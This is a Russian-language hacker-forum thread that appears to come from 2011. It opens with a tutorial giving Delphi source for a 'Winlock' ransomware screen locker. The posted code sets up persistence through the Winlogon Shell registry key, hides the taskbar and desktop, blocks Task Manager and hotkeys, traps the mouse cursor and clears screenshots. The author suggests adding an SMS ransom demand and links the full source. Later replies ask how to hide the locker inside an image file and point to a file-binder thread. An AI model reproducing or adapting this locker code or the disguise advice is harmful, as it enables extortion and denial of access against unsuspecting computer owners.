Старый 09.02.2011, 07:55   #1
Spiderxxx
RAM 256MB
 
Аватар для Spiderxxx
 
Регистрация: 22.01.2011
Сообщений: 544
Spiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царстве
Spiderxxx вне форума

40 Статья [Winlock]


Всем добрый вечер.
Видел инете, уже статью по написанию своего блокиратора на asm, c#.
Вот решил, написать свое детище, на делфи.
Только сразу попрошу, сильно ногами не пинать, это моя первая статья, поэтому если что не так прошу обсуждение в этой теме :icon_e_smile:

Ну чтож преступим:

Открываем дельфина и кидаем куда базовые элементы: текстовое поле и кнопку.
Едем дальше...наш блокиратор, должен прописаться в автозагрузку, причем и в безопасном режиме,скрывать все значки, быть по верх всех окон, блокировать нажатие alt+tab, alt+f4 и диспечер задач, а при правильном вводе паса (пусть это будет 123) скрываться, но при перезагрузке вновь появляться)) Так же тут я пользуюсь 2мя таймерами:
1й который по концу отсчета просто закрывает форму, второй для отлавливания диспечера и прочей гадости, и постоянного "вывешивания" блокера поверх всех окон)) :dc:

Начинаем кодить:

В создании формы мы прописываемся в автозагрузку, копируя себя в ключе позади, explorer.exe....благодаря этому мы будем подгружаться и в безопасном режиме тоже)Далее блочим ненужные нам клавиши, с помощью которых нас могут убрать, и конечно же копируем файл с директорию windows:di: Также выставляем значения перемнных для таймера, котрый по концу своего отсчета просто закрывает наш блокер.

Код:
procedure TForm1.FormCreate(Sender: TObject);
var
hTaskBar : THandle;
TDWH:THandle;
Reg: TRegistry;
begin

CopyFile(PChar(ParamStr(0)), PChar('C:\Windows\' + ExtractFileName(ParamStr(0))), True);
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
Reg.WriteString('SHELL','Explorer.exe,' + 'C:\Windows\' + ExtractFileName(ParamStr(0)));
Reg.CloseKey;
Reg.Free;

sec:=30;
min:=90;
ShowWindow (Application.handle, SW_HIDE);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,1,0,0);
hTaskbar := FindWindow('Shell_TrayWnd', Nil);
ShowWindow(hTaskBar, SW_HIDE);
ShowWindow(FindWindow(nil,'Program Manager'),SW_HIDE);
RegisterHotKey(Handle, 1, MOD_ALT, VK_TAB);
TDWH:=FindWindow(nil,'Диспетчер задач Windows');
if TDWH=0 then ShellExecute(0,'open','taskmgr.exe',nil,nil,SW_HIDE)
            else ShowWindow(TDWH,SW_HIDE);
end;

Разберемся с обработкой кнопки, если правельный пасс, то мы закрываем прогу, показываем интерфейс рабочего стола, разблокируем диспечер и внопки которые блочили

Код:
procedure TForm1.Button1Click(Sender: TObject);
var
hTaskBar : THandle;
TDWH:THandle;
Password:string[10];
begin
Password:=edit1.text;
If (Password='123') then
begin
SystemParametersInfo(SPI_SCREENSAVERRUNNING,0,0,0);
ShowWindow(FindWindow(nil,'Program Manager'),SW_SHOW);
hTaskbar := FindWindow('Shell_TrayWnd', Nil);
ShowWindow(hTaskBar, SW_SHOWNORMAL);
TDWH:=FindWindow(nil, 'Диспетчер задач Windows');
ShowWindow(TDWH,SW_SHOWNORMAL);
UnRegisterHotKey(Handle, 1);
Close;
end
else Edit1.Clear;
end;
Теперь таймера:
Отлавливаем,Редактор рееста, диспечер и прочую гадость, которая сможеть помешать работе нашей программы..выводим наш блокер на 1е место, и было принято решение сделать так чтобы курсор крысы, не мог вылазить за границы программы:

Код:
procedure TForm1.Timer1Timer(Sender: TObject);
var
h:HWND;
curs: TRect;
begin
Form1.FormStyle := fsStayOnTop;
h:=FindWindow('Progman',nil);
ShowWindow(h,sw_hide);
h:=FindWindow('Shell_TrayWnd',nil);
ShowWindow(h,sw_hide);
h:=FindWindow(nil,'Редактор реестра');
ShowWindow(h,sw_hide);
h:=FindWindow(nil,'Настройка системы');
ShowWindow(h,sw_hide);
h:=FindWindow(nil,'Диспетчер задач Windows');
ShowWindow(h,sw_hide);
SetWindowPos(Handle,HWND_TOPMOST,Left,Top,Width,Height,SWP_NOACTIVATE Or SWP_NOMOVE Or SWP_NOSIZE);
curs := Rect(Form1.Left+0, Form1.Top+0, Form1.Left + Form1.Width-0, Form1.Top + Form1.Height-0);
ClipCursor(@curs);
end;
2й таймер, будет отсчитывать время до закрытия блокера:

Код:
procedure TForm1.Timer2Timer(Sender: TObject);
begin
sec := sec - 1;
ShowTime;
if (min = 0) and (sec = 0) then
begin
Close;
end;
if (sec = 0) and (min > 0) then
begin
sec := 60;
min := min - 1;
end;
end;
Но мало просто отсчитать это время, его нужно и показать пользователю, для этого сделаем процедуру ShowTime;

Код:
procedure ShowTime;
var
    buf: string[20];
begin
  if min < 10 then
     buf := '0' + IntToStr(min) + ':'
  else
     buf := IntToStr(min) + ':';

  if sec < 10 then
    buf := buf + '0' + IntToStr(sec)
  else
    buf := buf + IntToStr(sec);

  Form1.Label3.Caption := buf;
end;
Также можно уменьшить «абузность» (кто в теме — тот поймет) — очищая буфер обмена при каждом нажатии PrintScreen.

Код:
if GetAsyncKeyState(VK_SNAPSHOT) <> 0 then
Clipboard.Clear;
Можете, поиграться со свойствами формы, для более замечательного эффекта...кидаем потом туда для визуального эффекта, картинку, надписи для отправки sms.

Вот что вышло у меня:
Раскрыть:

[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]

[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]

Ну вот в принципе и все, это не самый навороченый блокиратор, но его можно совершенствовать и сделать просто "зверя" :co:

Статью писал, специально для xakepok.net.
Скачать исходник:
В коде есть несколько, наипростейших ошибок, которые вам придется исправить)
[hide=5]http://multi-up.com/439729[/hide]

P.S Я не несу никакой ответственности, за этот блокиратор, который вы можете прменять в своих корыстных целях):comando:
  Ответить с цитированием
Последний раз редактировалось mironich; 11.04.2011 в 22:43.
Ответ: Статья [Winlock]
Старый 09.02.2011, 11:44   #2
O'NeiLL
RAM 256MB
 
Аватар для O'NeiLL
 
Регистрация: 04.11.2010
Сообщений: 968
O'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордится
O'NeiLL вне форума
По умолчанию Ответ: Статья [Winlock]

если я всё правильно понял то он через какое то время сам закроется?(на скринах есть такойто таймер)
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 09.02.2011, 11:47   #3
Spiderxxx
RAM 256MB
 
Аватар для Spiderxxx
 
Регистрация: 22.01.2011
Сообщений: 544
Spiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царстве
Spiderxxx вне форума
По умолчанию Ответ: Статья [Winlock]

Да, тот таймер который виден на скрине, просто по истечению времени закрывает блокер, при этом не востанавливая интерфейс)

Цитата:
Так же тут я пользуюсь 2мя таймерами:
1й который по концу отсчета просто закрывает форму, второй для отлавливания диспечера и прочей гадости, и постоянного "вывешивания" блокера поверх всех окон))
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 09.02.2011, 11:48   #4
O'NeiLL
RAM 256MB
 
Аватар для O'NeiLL
 
Регистрация: 04.11.2010
Сообщений: 968
O'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордится
O'NeiLL вне форума
По умолчанию Ответ: Статья [Winlock]

а можно исходник в exe шник преобразовать что бы 1 файл был&
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Последний раз редактировалось O'NeiLL; 09.02.2011 в 11:53.
Ответ: Статья [Winlock]
Старый 09.02.2011, 11:59   #5
Spiderxxx
RAM 256MB
 
Аватар для Spiderxxx
 
Регистрация: 22.01.2011
Сообщений: 544
Spiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царстве
Spiderxxx вне форума
По умолчанию Ответ: Статья [Winlock]

Цитата:
а можно исходник в exe шник преобразовать что бы 1 файл был&
Всм? О_о

Как бы на то он и сходник чтобы его редактировать и билдить в исполняемый файл...
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 09.02.2011, 12:17   #6
O'NeiLL
RAM 256MB
 
Аватар для O'NeiLL
 
Регистрация: 04.11.2010
Сообщений: 968
O'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордится
O'NeiLL вне форума
По умолчанию Ответ: Статья [Winlock]

ок всё понял чёт я тупанул)))
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 20.02.2011, 02:25   #7
vector.ci
RAM 2MB
 
Аватар для vector.ci
 
Регистрация: 07.02.2011
Сообщений: 3
vector.ci Новичок
vector.ci вне форума
По умолчанию Ответ: Статья [Winlock]

А можно его в картинку впихнуть ? вернее слить, чтобы пользователь при юзание картинке открывал наш блокиратор (Не заметно) и комп автоматический делал релог или показывал экран смерти. (После перезагрузки всплывал и унлокер) ?
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 20.02.2011, 14:46   #8
therf2
RAM 256MB
 
Аватар для therf2
 
Регистрация: 17.12.2010
Сообщений: 320
therf2 - весьма и весьма положительная личностьtherf2 - весьма и весьма положительная личность
therf2 вне форума
По умолчанию Ответ: Статья [Winlock]

Цитата:
Сообщение от vector.ci Посмотреть сообщение
А можно его в картинку впихнуть ? вернее слить, чтобы пользователь при юзание картинке открывал наш блокиратор (Не заметно) и комп автоматический делал релог или показывал экран смерти. (После перезагрузки всплывал и унлокер) ?
Впихнуть нет,склеить можно.
Вот одна из тем про это [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 23.02.2011, 03:42   #9
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Статья [Winlock]

Цитата:
Сообщение от alexdark Посмотреть сообщение
а можно будет картинку поменять?
Да
  Ответить с цитированием
Ответ: Статья [Winlock]
Старый 23.02.2011, 04:46   #10
Spiderxxx
RAM 256MB
 
Аватар для Spiderxxx
 
Регистрация: 22.01.2011
Сообщений: 544
Spiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царствеSpiderxxx - луч света в тёмном царстве
Spiderxxx вне форума
По умолчанию Ответ: Статья [Winlock]

Цитата:
а можно будет картинку поменять?
Да, исходники выложены, можете под себя его настраивать как вам угодно..
__________________




Я не злопамятный, но логи перечитываю (c)

  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot